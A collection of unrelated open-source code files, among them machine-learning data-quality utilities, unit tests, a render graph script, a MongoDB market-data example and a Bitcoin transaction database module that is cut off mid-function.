out.write('// glTexCoordPointer(2, GL_FLOAT, sizeof(TexturedVertexData3D), &%sVertexData[0].texCoord);\n' % basename)
elif len(mesh.vertex_colors) > 0:
out.write('// glColorPointer(4, GL_FLOAT, sizeof(ColoredVertexData3D), &%sVertexData[0].color);\n' % basename)
out.write('// glDrawArrays(GL_TRIANGLES, 0, k%sNumberOfVertices);\n' % basename)
out.write('// glDisableClientState(GL_VERTEX_ARRAY);\n')
if len(mesh.uv_textures) > 0:
out.write('// glDisableClientState(GL_TEXTURE_COORD_ARRAY);\n')
elif len(mesh.vertex_colors) > 0:
out.write('// glDisableClientState(GL_NORMAL_ARRAY);\n')
out.write('// glDisable(GL_COLOR_MATERIAL);\n')
out.write('// glDisableClientState(GL_NORMAL_ARRAY);\n\n\n')
out.close()
def save(operator, context, filepath="",
use_triangles=False,
use_edges=True,
use_normals=False,
use_hq_normals=False,
use_uvs=True,
use_materials=True,
copy_images=False,
use_modifiers=True,
use_rotate_x90=True,
use_blen_objects=True,
group_by_object=False,
group_by_material=False,
keep_vertex_order=False,
use_vertex_groups=False,
use_nurbs=True,
use_selection=True,
use_all_scenes=False,
use_animation=False,
):
write_objc(filepath,context)
return {'FINISHED'}
|
src/ydata_quality/utils/modelling.py | poga/ydata-quality | 242 | 12775477 | """
Utilities based on building baseline machine learning models.
"""
from typing import Union, Optional
from pandas import DataFrame, Series
from numpy import mean, tile, empty, std, square, sqrt, log as nplog, reciprocal
from scipy.stats import boxcox, normaltest, mode
from sklearn.compose import ColumnTransformer
from sklearn.exceptions import ConvergenceWarning, DataConversionWarning
from sklearn.impute import SimpleImputer
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.metrics import mean_squared_error, roc_auc_score
from sklearn.mixture import GaussianMixture
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import (FunctionTransformer, OneHotEncoder,
RobustScaler, StandardScaler,
label_binarize)
from sklearn.utils._testing import ignore_warnings
from .auxiliary import infer_dtypes
from .enum import PredictionTask
BASELINE_CLASSIFIER = Pipeline([
('imputer', SimpleImputer()),
('classifier', LogisticRegression())
])
BASELINE_REGRESSION = Pipeline([
('imputer', SimpleImputer()),
('classifier', LinearRegression())
])
NUMERIC_TRANSFORMER = Pipeline([
('imputer', SimpleImputer()),
('scaler', StandardScaler())])
CATEGORICAL_TRANSFORMER = Pipeline([
('imputer', SimpleImputer(strategy='most_frequent')),
('encoder', OneHotEncoder(handle_unknown='ignore'))])
ORDINAL_TRANSFORMER = None # Not implemented
def get_prediction_task(df: DataFrame, label: str):
"Heuristics to infer prediction task (classification/regression)."
return 'classification' if len(set(df[label])) == 2 else 'regression'
@ignore_warnings(category=ConvergenceWarning)
def baseline_predictions(df: DataFrame, label: str, task='classification'):
"Train a baseline model and predict for a test set"
# 0. Infer the prediction task
task = get_prediction_task(df=df, label=label)
# 1. Define the baseline model
model = BASELINE_CLASSIFIER if task == 'classification' else BASELINE_REGRESSION
# 2. Train overall model
x_orig, y_orig = df.drop(label, axis=1), label_binarize(df[label], classes=list(set(df[label])))
x_train, x_test, y_train, y_test = train_test_split(x_orig, y_orig, test_size=0.3, random_state=42)
model.fit(x_train.select_dtypes('number'), y_train)
# 3. Predict
if task == 'regression':
y_pred = model.predict(x_test.select_dtypes('number'))
elif task == 'classification':
y_pred = model.predict_proba(x_test.select_dtypes('number'))[:, 1]
# 4. Return both the predictions and x_test, y_test to analyze the performances
return y_pred, x_test, y_test
@ignore_warnings(category=DataConversionWarning)
def baseline_performance(df: DataFrame, label: str,
task: PredictionTask = PredictionTask.CLASSIFICATION,
adjusted_metric: bool = False):
"""Train a baseline model, predict for a test set and return the performance.
Args:
- df (DataFrame): original dataset
- label (str): name of target feature column
- task (PredictionTask): classification, regression
- adjusted_metric (bool): if True, return metric as percentage of max achievable performance
"""
# 0. Infer the prediction task
task = get_prediction_task(df=df, label=label)
# 1. Define the baseline performance metric
metric = roc_auc_score if task == 'classification' else mean_squared_error
# 2. Get the baseline predictions
y_pred, _, y_test = baseline_predictions(df=df, label=label, task=task)
# 3. Get the performance
if adjusted_metric:
perf = adjusted_performance(y_test, y_pred, task=task, metric=metric)
else:
perf = metric(y_test, y_pred)
return perf
def adjusted_performance(y_true, y_pred, task: PredictionTask, metric: callable):
"""Calculates the adjusted metric as ratio of real to maximum performance.
Returns the percentage to the best achievable performance starting from a baseline.
"""
task = PredictionTask(task)
y_default = mean(y_true) if task == PredictionTask.CLASSIFICATION else mode(y_true).mode[0] # define the value
y_base = tile(y_default, (len(y_true), 1)) # create an array with default value
best_perf = metric(y_true, y_true)
base_perf = metric(y_true, y_base)
real_perf = metric(y_true, y_pred)
return (real_perf - base_perf) / (best_perf - base_perf)
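# For example, with base_perf = 0.5, best_perf = 1.0 and real_perf = 0.8 the
# adjusted score is (0.8 - 0.5) / (1.0 - 0.5) = 0.6, i.e. 60% of the headroom
# above the trivial baseline was captured.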
@ignore_warnings(category=DataConversionWarning)
def performance_per_feature_values(df: DataFrame, feature: str, label: str, task='classification'):
"""Performance achieved per each value of a groupby feature."""
# 0. Infer the prediction task
task = get_prediction_task(df=df, label=label)
# 1. Define the baseline performance metric
metric = roc_auc_score if task == 'classification' else mean_squared_error
# 2. Get the baseline predictions
y_pred, x_test, y_test = baseline_predictions(df=df, label=label, task=task)
# 3. Get the performances per feature value
uniques = set(x_test[feature])
results = {}
for value in uniques: # for each category
y_pred_cat = y_pred[x_test[feature] == value]
y_true_cat = y_test[x_test[feature] == value]
try:
results[value] = metric(y_true_cat, y_pred_cat)
except ValueError as exc:
results[value] = f'[ERROR] Failed performance metric with message: {exc}'
return results
def performance_per_missing_value(df: DataFrame, feature: str, label: str, task='classification'):
"""Performance difference between valued and missing values in feature."""
# 0. Infer the prediction task
task = get_prediction_task(df=df, label=label)
# 1. Define the baseline performance metric
metric = roc_auc_score if task == 'classification' else mean_squared_error
# 2. Get the baseline predictions
y_pred, x_test, y_test = baseline_predictions(df=df, label=label, task=task)
# 3. Get the performance per valued vs missing feature
missing_mask = x_test[feature].isna()
results = {}
results['missing'] = metric(y_test[missing_mask], y_pred[missing_mask])
results['valued'] = metric(y_test[~missing_mask], y_pred[~missing_mask])
return results
@ignore_warnings(category=ConvergenceWarning)
def predict_missingness(df: DataFrame, feature: str):
"Train a baseline model to predict the missingness of a feature value."
# 0. Preprocessing
df = df.copy() # avoid altering the original DataFrame
target = f'is_missing_{feature}'
# 1. Define the baseline model
model = BASELINE_CLASSIFIER
# 2. Create the new target
df[target] = df[feature].isna()
# 3. Train overall model
x_orig, y_orig = df.drop([feature, target], axis=1), df[target]
x_train, x_test, y_train, y_test = train_test_split(x_orig, y_orig, test_size=0.3, random_state=42)
model.fit(x_train.select_dtypes('number'), y_train)
# 4. Predict
y_pred = model.predict_proba(x_test.select_dtypes('number'))[:, 1]
# 5. Return the area under the roc curve
return roc_auc_score(y_test, y_pred)
def standard_transform(df, dtypes, skip: Optional[list] = None, robust=False):
"""Applies standard transformation to the dataset (imputation, centering and scaling), returns transformed data
and the fitted transformer.
Numerical data is imputed with mean, centered and scaled by 4 standard deviations.
Categorical data is imputed with mode. Encoding is not performed in this stage to preserve the same columns.
If robust is passed as True, will truncate numerical data before computing statistics.
[1]From 1997 <NAME>; Martinez, <NAME>. -
Improved Heterogeneous Distance Functions https://arxiv.org/pdf/cs/9701101.pdf
"""
skip = [] if skip is None else skip
numerical_features = [key for key, value in dtypes.items() if value == 'numerical' and key not in skip]
categorical_features = [key for key, value in dtypes.items() if value == 'categorical' and key not in skip]
assert len(numerical_features + categorical_features +
skip) == len(df.columns), 'the union of dtypes keys with skip should be the same as the df columns'
if robust:
numeric_transformer = Pipeline([
('imputer', SimpleImputer()),
('scaler', RobustScaler(quantile_range=(5.0, 95.0)))])
else:
numeric_transformer = NUMERIC_TRANSFORMER
preprocessor = ColumnTransformer(
transformers=[ # Numerical vars are scaled by 4sd so that most of the data are fit in the [-1, 1] range
('num', Pipeline(numeric_transformer.steps + \
[('divby4', FunctionTransformer(lambda x: x / 4))]), numerical_features),
('cat', Pipeline([('impute', SimpleImputer(strategy='most_frequent'))]), categorical_features)],
remainder='passthrough')
new_column_order = numerical_features + categorical_features + skip
tdf = DataFrame(preprocessor.fit_transform(df), index=df.index, columns=new_column_order)
return tdf, preprocessor
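# For example, after standard scaling a value at +2 standard deviations becomes
# 0.5 once divided by 4, so roughly 95% of a normally distributed column lands
# in [-0.5, 0.5] and practically all of it in the [-1, 1] range targeted above.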
def performance_one_vs_rest(df: DataFrame, label_feat: str, _class: str, dtypes=None):
"""Train a classifier to predict a class in binary fashion against all other classes.
A normalized dataframe should be passed for best results"""
# 0. Preprocessing
df = df.copy() # avoid altering the original DataFrame
# 1. Define the baseline model
if not dtypes:
dtypes = infer_dtypes(df)
categorical_features = [key for key, value in dtypes.items() if value == 'categorical' and key != label_feat]
preprocessor = ColumnTransformer(
transformers=[('cat', CATEGORICAL_TRANSFORMER, categorical_features)]) # OHE categorical variables
model = Pipeline([('preprocessing', preprocessor), ('classifier', LogisticRegression())])
# 2. Train overall model
x_orig, y_orig = df.drop(label_feat, axis=1), label_binarize(df[label_feat], classes=[_class]).squeeze()
x_train, x_test, y_train, y_test = train_test_split(x_orig, y_orig, test_size=0.3, random_state=24)
model.fit(x_train, y_train)
# 3. Predict
y_pred = model.predict_proba(x_test)[:, 1]
# 4. Return the area under the roc curve
return roc_auc_score(y_test, y_pred)
def center_of_mass_statistic(column: Series, col_dtype: str) -> Union[float, int, str]:
"Returns a center of mass statistic of a column based on its dtype."
return column.mean() if col_dtype == 'numerical' else column.mode()[0] # only first mode
def estimate_centroid(df: DataFrame, dtypes: dict = None):
"""Makes a centroid estimation for a given dataframe.
Will use provided dtypes or infer in order to use best statistic columnwise"""
if dtypes:
        if not all(col in dtypes for col in df.columns):
            # dict.update mutates in place and returns None; only infer the missing columns
            dtypes.update(infer_dtypes(df, skip=list(dtypes)))
else:
dtypes = infer_dtypes(df)
centroid = Series(df.iloc[0])
for col in centroid.index:
centroid[col] = center_of_mass_statistic(df[col], dtypes[col])
return centroid
def heom(x_df: DataFrame, y_df, dtypes):
"""Implements the Heterogeneous Euclidean-Overlap Metric between a sample x and a reference y.
The data is assumed to already be preprocessed (normalized and imputed).
[1]From 1997 <NAME>; <NAME>. -
Improved Heterogeneous Distance Functions https://arxiv.org/pdf/cs/9701101.pdf
"""
distances = DataFrame(empty(x_df.shape), index=x_df.index, columns=x_df.columns)
distance_funcs = {'categorical': lambda x, y: 0 if x == y else 1,
'numerical': lambda x, y: abs(x - y)} # Here we are assuming the data to be previously scaled
for col_idx, column in enumerate(distances.columns):
distances[column] = x_df[column].apply(distance_funcs[dtypes[column]], args=[y_df[col_idx]])
return distances
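# Illustrative sketch of how heom() is used (column names and values are made
# up; the data is assumed to be already normalized as the docstring requires):
#
#   sample = DataFrame({"height": [0.1, -0.2], "colour": ["red", "blue"]})
#   reference = estimate_centroid(sample)          # per-column mean / mode
#   distances = heom(sample, reference, infer_dtypes(sample))
#   # numerical columns use |x - y|, categorical columns a 0/1 overlap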
def estimate_sd(sample: DataFrame, reference=None, dtypes=None):
"""Estimates the standard deviation of a sample of records.
A reference can be passed in order to avoid new computation of mean or to use distances to another reference point.
The reference is expected as a (1, N) array where N is the number of columns in the sample.
Returns:
std_dev: the standard deviation of the distance vectors of the sample to the reference point
std_distances: the distances of the sample points to the reference point scaled by std_dev
"""
if dtypes: # Ensure dtypes are compatible with sample
        if not all(col in dtypes for col in sample.columns):
            dtypes.update(infer_dtypes(sample, skip=list(dtypes)))
else:
dtypes = infer_dtypes(sample)
if reference is None:
reference = estimate_centroid(sample, dtypes)
else:
assert len(reference) == len(
sample.columns), "The provided reference point does not have the same dimension as the sample records"
distances = heom(x_df=sample, y_df=reference, dtypes=dtypes)
euclidean_distances = (distances.apply(square).sum(axis=1) / len(sample.columns)).apply(sqrt)
std_dev = std(euclidean_distances)
std_distances = euclidean_distances / std_dev
return std_dev, std_distances
def gmm_clustering(data, n_gaussians):
"""Produces a GMM model with n_gaussians to cluster provided data."""
gmm_ = GaussianMixture(n_components=n_gaussians).fit(data)
return gmm_.predict(data), gmm_.aic(data)
def normality_test(data, suite='full', p_th=5e-3):
"""Performs a normality test on the data. Null hypothesis, data comes from normal distribution.
A transformations taken from a suite is applied to the data before each run of the normal test.
The first transformation in the suite that passes the normalcy test is returned
Returns:
result: True if any transformation led to a positive normal test, False otherwise
test: The first test in the suite to lead to positive normal test"""
transforms = {None: lambda x: x,
'inverse': reciprocal,
'square root': sqrt,
'log': nplog,
                  'Box Cox': lambda x: boxcox(x)[0]}  # boxcox returns (transformed, lmbda); keep only the data
if suite == 'full':
suite = transforms.keys()
else:
suite = list(suite) if isinstance(suite, str) else suite
for transform in suite:
try:
transformed_data = transforms[transform](data)
_, p_stat = normaltest(transformed_data, nan_policy='raise')
except (AttributeError, TypeError, ZeroDivisionError, ValueError):
continue
if p_stat > p_th:
return True, transform, p_stat
return False, None, None
|
aggregables/sequences/suffix_trees/suffix_trees/test/test_simple.py | nevesnunes/aggregables | 106 | 12775482 | <filename>aggregables/sequences/suffix_trees/suffix_trees/test/test_simple.py
from suffix_trees import STree
def test_lcs():
a = ["abeceda", "abecednik", "abeabecedabeabeced",
"abecedaaaa", "aaabbbeeecceeeddaaaaabeceda"]
st = STree.STree(a)
assert st.lcs() == "abeced", "LCS test"
def test_missing():
text = "name language w en url http w namelanguage en url http"
stree = STree.STree(text)
assert stree.find("law") == -1
assert stree.find("ptth") == -1
assert stree.find("name language w en url http w namelanguage en url httpp") == -1
def test_find():
st = STree.STree("abcdefghab")
assert st.find("abc") == 0
assert st.find_all("ab") == {0, 8}
|
Tests/image_tests/renderpasses/graphs/ForwardRendering.py | wsqjny/Falcor | 1,615 | 12775491 | from falcor import *
def render_graph_ForwardRendering():
loadRenderPassLibrary("DepthPass.dll")
loadRenderPassLibrary("ForwardLightingPass.dll")
loadRenderPassLibrary("BlitPass.dll")
testForwardRendering = RenderGraph("ForwardRenderer")
DepthPass = createPass("DepthPass", {'depthFormat': ResourceFormat.D32Float})
testForwardRendering.addPass(DepthPass, "DepthPass")
SkyBox = createPass("SkyBox")
testForwardRendering.addPass(SkyBox, "SkyBox")
ForwardLightingPass = createPass("ForwardLightingPass", {'sampleCount': 1, 'enableSuperSampling': False})
testForwardRendering.addPass(ForwardLightingPass, "ForwardLightingPass")
BlitPass = createPass("BlitPass", {'filter': SamplerFilter.Linear})
testForwardRendering.addPass(BlitPass, "BlitPass")
testForwardRendering.addEdge("ForwardLightingPass.color", "BlitPass.src")
testForwardRendering.addEdge("DepthPass.depth", "ForwardLightingPass.depth")
testForwardRendering.addEdge("DepthPass.depth", "SkyBox.depth")
testForwardRendering.addEdge("SkyBox.target", "ForwardLightingPass.color")
testForwardRendering.markOutput("BlitPass.dst")
testForwardRendering.markOutput("ForwardLightingPass.motionVecs")
return testForwardRendering
ForwardRendering = render_graph_ForwardRendering()
try: m.addGraph(ForwardRendering)
except NameError: None
|
tests/lib/collectors/bigquery.py | dfjxs/dftimewolf | 191 | 12775535 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests the BigQuery collector."""
import unittest
import mock
from dftimewolf.lib import state
from dftimewolf.lib.collectors import bigquery
from dftimewolf import config
class BigQueryCollectorTest(unittest.TestCase):
"""Tests for the BigQuery collector."""
def testInitialization(self):
"""Tests that the collector can be initialized."""
test_state = state.DFTimewolfState(config.Config)
bq_collector = bigquery.BigQueryCollector(test_state)
self.assertIsNotNone(bq_collector)
@mock.patch('google.cloud.bigquery.Client')
def testQuery(self, mock_bq):
"""Tests that the collector calls the BQ client."""
mock_bq().query().to_dataframe().to_json.return_value = "{'foo':1}"
test_state = state.DFTimewolfState(config.Config)
bq_collector = bigquery.BigQueryCollector(test_state)
bq_collector.SetUp('test_project', 'test_query', 'test_description')
bq_collector.Process()
mock_bq().query.assert_called_with('test_query')
mock_bq().query().to_dataframe().to_json.assert_called_once()
if __name__ == '__main__':
unittest.main()
|
tests/r/test_engel.py | hajime9652/observations | 199 | 12775552 | <reponame>hajime9652/observations<gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.engel import engel
def test_engel():
"""Test module engel.py by downloading
engel.csv and testing shape of
extracted data has 235 rows and 2 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = engel(test_path)
try:
assert x_train.shape == (235, 2)
except:
shutil.rmtree(test_path)
    raise
|
dvc/parsing/versions.py | lucasalavapena/dvc | 9,136 | 12775586 | <reponame>lucasalavapena/dvc
import enum
from collections.abc import Mapping
from voluptuous import validators
SCHEMA_KWD = "schema"
META_KWD = "meta"
def lockfile_version_schema(value):
expected = [LOCKFILE_VERSION.V2.value] # pylint: disable=no-member
msg = "invalid schema version {}, expected one of {}".format(
value, expected
)
return validators.Any(*expected, msg=msg)(value)
class VersionEnum(str, enum.Enum):
@classmethod
def all_versions(cls):
return [v.value for v in cls]
class LOCKFILE_VERSION(VersionEnum):
V1 = "1.0"
V2 = "2.0"
@classmethod
def from_dict(cls, data):
# 1) if it's empty or or is not a dict, use the latest one (V2).
# 2) use the `schema` identifier if it exists and is a supported
# version
# 3) if it's not in any of the supported version, use the latest one
# 4) if there's no identifier, it's a V1
if not data or not isinstance(data, Mapping):
return cls(cls.V2)
version = data.get(SCHEMA_KWD)
if version:
return cls(version if version in cls.all_versions() else cls.V2)
return cls(cls.V1)
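        # Illustrative behaviour of the rules above (made-up call sites):
        #   from_dict({}) -> V2; from_dict({"schema": "2.0"}) -> V2
        #   from_dict({"schema": "9.9"}) -> V2 (unsupported, fall back to latest)
        #   from_dict({"stages": {...}}) -> V1 (no schema identifier)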
|
tcapy_examples/gen/mongo_aws_examples.py | Ahrvo-Trading-Systems/tcapy | 189 | 12775616 | <reponame>Ahrvo-Trading-Systems/tcapy
"""This shows how we can connect to an instance of MongoDB Atlas to read/write market tick data
Note, that you will need to get a MongoDB Atlas cloud account, and change the connection string below for it to work
"""
__author__ = 'saeedamen' # <NAME> / <EMAIL>
#
# Copyright 2020 Cuemacro Ltd. - http//www.cuemacro.com / @cuemacro
#
# See the License for the specific language governing permissions and limitations under the License.
#
import datetime
import time
from tcapy.util.loggermanager import LoggerManager
from tcapy.conf.constants import Constants
from tcapy.data.datafactory import MarketRequest
from tcapy.data.databasesource import DatabaseSourceArctic
from tcapy.util.mediator import Mediator
from tcapy.util.customexceptions import *
from test.config import *
logger = LoggerManager().getLogger(__name__)
constants = Constants()
logger.info('Make sure you have created folder ' + constants.csv_folder + ' & ' + constants.temp_data_folder +
' otherwise tests will fail')
Mediator.get_volatile_cache().clear_cache()
########################################################################################################################
# YOU MAY NEED TO CHANGE THESE
start_date = '26 Apr 2017'
finish_date = '05 Jun 2017'
ticker = 'EURUSD'
# Market data parameters for tables/databases
test_harness_arctic_market_data_table = 'market_data_table_test_harness'
test_harness_arctic_market_data_store = 'arctic-testharness'
csv_market_data_store = resource('small_test_market_df.parquet')
csv_reverse_market_data_store = resource('small_test_market_df_reverse.parquet')
# Note, you'll need to get your own connection string!
# You can setup your own MongoDB instance on the cloud using MongoDB Atlas https://www.mongodb.com/cloud/atlas
# It will give you the connection string to use
arctic_connection_string = "mongodb+srv://<username>:<password>@cluster0.blah-blah.mongodb.net/?retryWrites=true&w=majority"
def write_mongo_db_atlas_arctic():
"""Tests we can write market data to Arctic/MongoDB on Atlas (cloud)
"""
market_loader = Mediator.get_tca_market_trade_loader(version=tcapy_version)
### Test we can read data from CSV and dump to Arctic (and when read back it matches CSV)
db_start_date = '01 Jan 2016';
db_finish_date = pd.Timestamp(datetime.datetime.utcnow())
database_source = DatabaseSourceArctic(postfix='testharness', arctic_lib_type='CHUNK_STORE', connection_string=arctic_connection_string)
# Write CSV to Arctic
database_source.convert_csv_to_table(csv_market_data_store, ticker,
test_harness_arctic_market_data_table,
if_exists_table='replace', if_exists_ticker='replace', market_trade_data='market',
remove_duplicates=False)
# Read back data from Arctic and compare with CSV
market_request = MarketRequest(start_date=db_start_date, finish_date=db_finish_date, ticker=ticker,
data_store=database_source, # test_harness_arctic_market_data_store,
market_data_database_table=test_harness_arctic_market_data_table)
market_df_load = market_loader.get_market_data(market_request=market_request)
print(market_df_load)
if __name__ == '__main__':
start = time.time()
write_mongo_db_atlas_arctic()
finish = time.time()
print('Status: calculated ' + str(round(finish - start, 3)) + "s")
|
atlas/foundations_rest_api/src/foundations_rest_api/versioning.py | DeepLearnI/atlas | 296 | 12775651 | from pkg_resources import get_distribution, DistributionNotFound
try:
__version__ = get_distribution('foundations_rest_api').version
except DistributionNotFound:
__version__ = None |
allennlp_models/tagging/predictors/sentence_tagger.py | matt-peters/allennlp-models | 402 | 12775658 | from allennlp.predictors.sentence_tagger import SentenceTaggerPredictor # noqa: F401
# This component lives in the main repo because we need it there for tests.
|
pycoind/blockchain/transaction.py | peerchemist/pycoind | 120 | 12775697 | <gh_stars>100-1000
# The MIT License (MIT)
#
# Copyright (c) 2014 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Transaction Database
#
# txck - transaction composite key (see below)
# txid_hint - hash integer, provides pruning to likely txid
# txn - the binary blob of the transaction
#
# The database is broken up into files about 1.75GB each (so file systems like
# FAT32 work). The database filename contains two numbers, a number of
# partitions (N) and an index (i) which is in the range [0, N). These files
# will be denoted as file(N, i)
#
# When inserting, we insert into the highest N. Given an id, we insert into
# file(N, get_q(txid) % N). The function get_q maps the txid bytes to an integer.
#
# When searching, we must check each partition level, so to search for id, we
# start at the highest N, and check:
# 1. file(N, get_q(txid) % N)
# 2. file(N / 2, get_q(txid) % (N / 2))
# 3. file(N / 4, get_q(txid) % (N / 4))
# and so on, until we reach a k, such that (N / (2 ** k)) < 4.
#
# We can also, over time migrate values into higher levels. This is a future
# todo, if performance becomes an issue.
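# For example, with N = 16 on disk, a lookup for a txid checks, in order,
# file(16, get_q(txid) % 16), file(8, get_q(txid) % 8) and file(4, get_q(txid) % 4),
# then stops, because the next level (2) would fall below MINIMUM_N (4).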
# Composite Keys
#
# We use composite keys so we can optimize space with the 8-byte rowid we get
# by default in a sqlite database as well as the speed gain as they are the
# keys in the B-Tree. (see: http://www.sqlite.org/lang_createtable.html#rowid)
#
# txck (transaction-composite-key: 43 bits)
# - (block-id:23 bits) (txn-index:20 bits)
#
# With these keys, we can support up to 8 million blocks, each block with up
# to 1 million transactions.
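# A sketch of that packing (the real helpers live in the keys module; the
# expressions below only illustrate the stated bit layout):
#   txck      = (block_id << 20) | txn_index   # 23-bit block id, 20-bit txn index
#   block_id  = txck >> 20                     # cf. keys.get_txck_blockid(txck)
#   txn_index = txck & 0xFFFFF                 # cf. keys.get_txck_index(txck)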
# Hints
#
# A hint (hash integer) is the integer value of a byte string, used to quickly prune
# any obviously non-matching elements. The remaining elements must then be
# compared against confirmed values, since the hash may yield false positives.
import os
import random
import sqlite3
import struct
from . import database
from . import keys
from .. import coins
from .. import protocol
from .. import script
from .. import util
__all__ = ['Database']
def get_q(txid):
'Compute the index q from a txid.'
return struct.unpack('>I', txid[:4])[0]
_KEY_DUP = 'PRIMARY KEY must be unique'
_0 = chr(0) * 32
class Transaction(object):
def __init__(self, database, row, _transaction = None):
keys = [n for (n, t, i) in database.Columns]
self._database = database
self._data = dict(zip(keys, row))
# cache for previous outputs' transactions, since it hits the database
self._po_cache = dict()
self._transaction = _transaction
version = property(lambda s: s.txn.version)
inputs = property(lambda s: s.txn.tx_in)
outputs = property(lambda s: s.txn.tx_out)
lock_time = property(lambda s: s.txn.lock_time)
hash = property(lambda s: s.txn.hash)
index = property(lambda s: keys.get_txck_index(s._txck))
def __getstate__(self):
return (self._po_cache, dict(txn = str(self._data['txn']), txck = self._data['txck']))
def __setstate__(self, state):
self._database = None
(self._po_cache, self._data) = state
self._transaction = None
def cache_previous_outputs(self):
for i in xrange(0, len(self.inputs)):
self.previous_transaction(i)
def previous_transaction(self, index):
"Returns the previous output's transaction for the input at index."
# coinbase transaction
if self.index == 0 and index == 0:
return None
# look up the previous output's transaction and cache it
if index not in self._po_cache:
po_hash = self.inputs[index].previous_output.hash
previous_txn = self._database.get(po_hash)
if previous_txn is None:
raise KeyError('missing transaction: %s' % po_hash)
self._po_cache[index] = previous_txn
# return the cache value
return self._po_cache[index]
def previous_output(self, index):
'Returns the previous output for the input at index.'
previous_txn = self.previous_transaction(index)
if previous_txn is None: return None
po = self.inputs[index].previous_output
return previous_txn.outputs[po.index]
def __str__(self):
return "<Transaction hash=0x%s>" % self.hash.encode('hex')
# transaction composite key and database block id; internal use
_txck = property(lambda s: s._data['txck'])
_blockid = property(lambda s: keys.get_txck_blockid(s._txck))
def _previous_uock(self, index):
previous_txn = self.previous_transaction(index)
if previous_txn is None: return None
po = self.inputs[index].previous_output
return keys.get_uock(previous_txn._txck, po.index)
@property
def txn(self):
'The raw transaction object.'
if self._transaction is None:
(vl, self._transaction) = protocol.Txn.parse(self.txn_binary)
return self._transaction
txn_binary = property(lambda s: str(s._data['txn']))
class Database(database.Database):
MINIMUM_N = 4
TARGET_SIZE = (1 << 30) * 7 // 4 # 1.75GB
Columns = [
('txck', 'integer primary key', False),
('txid_hint', 'integer', True),
('txn', 'blob', False),
]
Name = 'txns'
def __init__(self, data_dir = None, coin = coins.Bitcoin):
database.Database.__init__(self, data_dir, coin)
# maps (n, i % n) tuples to sqlite connection
self._connections = dict()
# the largest N level on disk
self._N = self.load_n()
# loading/creating a connection loads/creates the entire level
n = self._N
while n >= self.MINIMUM_N:
self.get_connection(n, 0, True)
n //= 2
#self._unspent = unspent.Database(self.data_dir, coin)
def load_n(self):
'Determine the highest N for a database directory.'
n = self.MINIMUM_N
while True:
if not os.path.isfile(self.get_filename(self.get_suffix(n * 2, 0))):
break
n *= 2
return n
def get_suffix(self, n, q):
return '-%03d-%03d' % (n, q % n)
def get_connection(self, n, q, allow_create = False):
'''Get a connection for the database file at (n, q % n). First a
connection cache is searched. Then the disk is checked for new
files, in which case every file at level n is loaded.
If allow_create and the database file does not exist, all
partitions at the level n are created.'''
# the location we want
loc = (n, q % n)
if loc not in self._connections:
locs = [(n, i) for i in xrange(0, n)]
# doesn't exist; create the files backward
if not os.path.isfile(self.get_filename(self.get_suffix(n, 0))):
if not allow_create: return None
locs.reverse()
for l in locs:
suffix = self.get_suffix(l[0], l[1])
self._connections[l] = database.Database.get_connection(self, suffix)
return self._connections[loc]
def check_size(self):
'Checks the sizes of the database level, increasing the size as needed.'
# if any (statistically selected) database is full, increase our size
suffix = self.get_suffix(self._N, random.randint(0, self._N - 1))
filename = self.get_filename(suffix)
if os.path.getsize(filename) > self.TARGET_SIZE:
self._N *= 2
self.get_connection(self._N, 0, True)
def add(self, block, transactions):
'Add transactions to the database.'
# expand the database if necessary
self.check_size()
# check the merkle root of the transactions against the block
block._check_merkle_root(util.get_merkle_root(transactions))
# for each transaction...
connections = dict()
block_txns = [ ]
for (txn_index, txn) in enumerate(transactions):
# ...get the database to save to
txid = txn.hash
q = get_q(txid)
connection = self.get_connection(self._N, q)
connections[(self._N, q % self._N)] = connection
# ...insert
cursor = connection.cursor()
txck = keys.get_txck(block._blockid, txn_index)
row = (txck, keys.get_hint(txid), buffer(txn.binary()))
try:
cursor.execute(self.sql_insert, row)
# (duplicates don't matter)
except sqlite3.IntegrityError, e:
if e.message != _KEY_DUP:
raise e
# wrap up the transaction for the returned block
block_txns.append(Transaction(self, row, txn))
# commit the transactions to the databases
for connection in connections.values():
connection.commit()
# update the block with the transactions
block._update_transactions(block_txns)
# return the now updated block
return block
# @TODO optimization: store in each txn db a max_blockid so we can prune
def _get(self, txck):
        'Look up a transaction by its transaction composite key (txck). Internal use.'
for connection in self._connections.values():
cursor = connection.cursor()
cursor.execute(self.sql_select + ' where txck = ?', (txck, ))
row = cursor.fetchone()
if row:
return Transaction(self, row)
return None
def _get_transactions(self, blockid):
"Find all transactions for a block, ordered by transaction index. Internal use."
# the range that this block's composite keys can have [lo, hi)
lo = keys.get_txck(blockid, 0)
hi = keys.get_txck(blockid + 1, 0)
# find all transactions across all databases within this range
txns = [ ]
for connection in self._connections.values():
cursor = connection.cursor()
cursor.execute(self.sql_select + ' where txck >= ? and txck < ?', (lo, hi))
txns.extend((r[0], r) for r in cursor.fetchall())
# sort by index (actually (blockid, index), but all have same blockid)
txns.sort()
# wrap it up in a helpful wrapper
return [Transaction(self, row) for (txck, row) in txns]
def get(self, txid, default = None):
'Get a transaction by its txid.'
# the hint we index by for faster lookup
txid_hint = keys.get_hint(txid)
# search each level (n, n // 2, n // 4, etc)
n = self._N
q = get_q(txid)
while n >= self.MINIMUM_N:
connection = self.get_connection(n, q)
cursor = connection.cursor()
